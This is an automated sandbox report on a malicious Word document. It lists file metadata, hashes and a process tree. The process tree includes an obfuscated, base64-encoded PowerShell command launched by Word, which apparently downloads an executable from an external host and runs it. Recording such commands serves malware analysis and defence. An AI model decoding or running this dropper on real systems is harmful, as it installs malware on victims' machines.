File name: | Sidney_Yarbrough.doc_ |
Full analysis: | https://app.any.run/tasks/725b93f2-10be-442d-8614-17b73674fd53 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 10:30:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Exclusive next generation instruction set, Subject: Maine Mark, Author: 1-148-512-6515, Comments: Multi-lateral mission-critical structure, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Fri Nov 9 09:10:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 9113C68179F1F4BA043C54A7D9D29A01 |
SHA1: | A26112A3A615BC89508AD04A9B281D41CDF42A09 |
SHA256: | 8586A5C9008E3502471C9ECF2141F4B2411B89A96DBA6C590D49EF4E2202A935 |
SSDEEP: | 1536:qs5ztL6rZMLt09RofluVym3VSyuJDU3nxyL482x+t5:pa8A+t+yZ8zjg5 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | Exclusive next generation instruction set |
---|---|
Subject: | Maine Mark |
Author: | 1-148-512-6515 |
Keywords: | - |
Comments: | Multi-lateral mission-critical structure |
Template: | Normal |
LastModifiedBy: | Пользователь Windows |
RevisionNumber: | 10 |
Software: | Microsoft Office Word |
TotalEditTime: | 2.0 minutes |
CreateDate: | 2018:04:19 18:59:00 |
ModifyDate: | 2018:11:09 09:10:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Cyrillic |
Manager: | Elenora D'Amore |
Company: | Stoltenberg, O'Conner and Rice Hanna Kertzmann DDS |
Bytes: | 96256 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_ | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3952 | CMd.eXe /c p@o@W@e@r@S@h@e@l@L@.@e@x@e@ @-@e@c@ @K@A@B@O@A@G@U@A@d@w@A@t@A@E@8@A@Y@g@B@q@A@G@U@A@Y@w@B@0@A@C@A@A@U@w@B@5@A@H@M@A@d@A@B@l@A@G@0@A@L@g@B@O@A@G@U@A@d@A@A@u@A@F@c@A@Z@Q@B@i@A@E@M@A@b@A@B@p@A@G@U@A@b@g@B@0@A@C@k@A@L@g@B@E@A@G@8@A@d@w@B@u@A@G@w@A@b@w@B@h@A@G@Q@A@R@g@B@p@A@G@w@A@Z@Q@A@o@A@C@I@A@a@A@B@0@A@H@Q@A@c@A@A@6@A@C@8@A@L@w@B@j@A@H@k@A@d@A@B@o@A@H@I@A@b@w@B@t@A@G@E@A@d@A@B@0@A@C@4@A@Y@w@B@v@A@G@0@A@L@w@B@X@A@E@U@A@U@w@A@v@A@G@Y@A@Y@Q@B@0@A@G@8@A@Z@w@A@u@A@H@A@A@a@A@B@w@A@D@8@A@b@A@A@9@A@G@U@A@a@Q@B@k@A@G@k@A@N@A@A@u@A@H@g@A@Y@Q@B@w@A@C@I@A@L@A@A@g@A@C@Q@A@Z@Q@B@u@A@H@Y@A@O@g@B@B@A@F@A@A@U@A@B@E@A@E@E@A@V@A@B@B@A@C@A@A@K@w@A@g@A@C@c@A@X@A@A@x@A@D@M@A@M@Q@A@x@A@G@M@A@O@A@A@1@A@G@I@A@L@g@B@l@A@H@g@A@Z@Q@A@n@A@C@k@A@O@w@A@g@A@F@M@A@d@A@B@h@A@H@I@A@d@A@A@t@A@F@A@A@c@g@B@v@A@G@M@A@Z@Q@B@z@A@H@M@A@I@A@A@k@A@G@U@A@b@g@B@2@A@D@o@A@Q@Q@B@Q@A@F@A@A@R@A@B@B@A@F@Q@A@Q@Q@A@n@A@F@w@A@M@Q@A@z@A@D@E@A@M@Q@B@j@A@D@g@A@N@Q@B@i@A@C@4@A@Z@Q@B@4@A@G@U@A@J@w@A@7@A@C@A@A@R@Q@B@4@A@G@k@A@d@A@A@= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDDF7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dney_Yarbrough.doc_ | pgc | |
MD5:C12C34027668605AFBD9EDA0B860E57C | SHA256:75D26FC05651695B7F3E0541FEC613A23E29799034BD54048586060B68DBC763 | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6138494EE04D6A4CE79A0DEF20DD36BE | SHA256:779BB61888F5B173AD0A1EE9015E28554E14054B70F520191C3B6670226647BB |